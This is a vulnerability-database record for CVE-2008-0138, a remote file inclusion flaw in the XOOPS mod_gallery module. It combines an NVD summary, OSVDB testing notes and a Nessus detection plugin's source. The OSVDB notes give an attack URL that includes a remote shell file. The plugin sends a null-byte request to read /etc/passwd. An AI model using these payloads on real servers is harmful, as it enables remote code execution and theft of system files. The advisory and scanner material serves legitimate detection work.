{"cve": [{"lastseen": "2019-05-29T18:09:24", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in xoopsgallery/init_basic.php in the mod_gallery module for XOOPS, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter.", "modified": "2017-09-29T01:30:00", "id": "CVE-2008-0138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0138", "published": "2008-01-08T19:46:00", "title": "CVE-2008-0138", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:36", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2\n## References:\nISS X-Force ID: 39461\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4847\n[CVE-2008-0138](https://vulners.com/cve/CVE-2008-0138)\nBugtraq ID: 27155\n", "modified": "2008-01-06T00:00:00", "published": "2008-01-06T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:40214", "id": "OSVDB:40214", "title": "mod_gallery Module for XOOPS xoopsgallery/init_basic.php GALLERY_BASEDIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T09:58:15", "bulletinFamily": "scanner", "description": "The remote host is running XoopsGallery, a third-party module for\nXoops. \n\nThe version of XoopsGallery installed on the remote host fails to\nsanitize user-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "XOOPSGALLERY_GALLERY_BASEDIR_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/nessus/29870", "published": "2008-01-08T00:00:00", "title": "XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29870);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2008-0138\");\n script_bugtraq_id(27155);\n script_xref(name:\"EDB-ID\", value:\"4847\");\n\n script_name(english:\"XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file with XoopsGallery\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to a remote\nfile include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running XoopsGallery, a third-party module for\nXoops. \n\nThe version of XoopsGallery installed on the remote host fails to\nsanitize user-supplied input to the 'GALLERY_BASEDIR' parameter of the\n'modules/xoopsgallery/init_basic.php' script before using it to\ninclude PHP code. Provided PHP's 'register_globals' setting is off,\nan unauthenticated, remote attacker may be able to exploit this issue\nto view arbitrary files on the remote host or to execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/01/08\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xoops:xoopsgallery_module\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # Try to retrieve a local file.\n file = \"/etc/passwd\";\n\n r = http_send_recv3(method:\"GET\", port: port, \n item:string(\n dir, \"/modules/xoopsgallery/init_basic.php?\", \n \"GALLERY_BASEDIR=\", file, \"%00\"\n ));\n if (isnull(r)) exit(0);\n res = r[2];\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error because magic_quotes was enabled or...\n string(\"main(\", file, \"\\\\0platform/fs_\") >< res ||\n # we get an error claiming the file doesn't exist or...\n string(\"main(\", file, \"): failed to open stream: No such file\") >< res ||\n # we get an error about open_basedir restriction.\n string(\"open_basedir restriction in effect. File(\", file) >< res\n )\n {\n if (egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = res - strstr(res, '<br');\n contents = data_protection::redact_etc_passwd(output:contents);\n report = string(\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}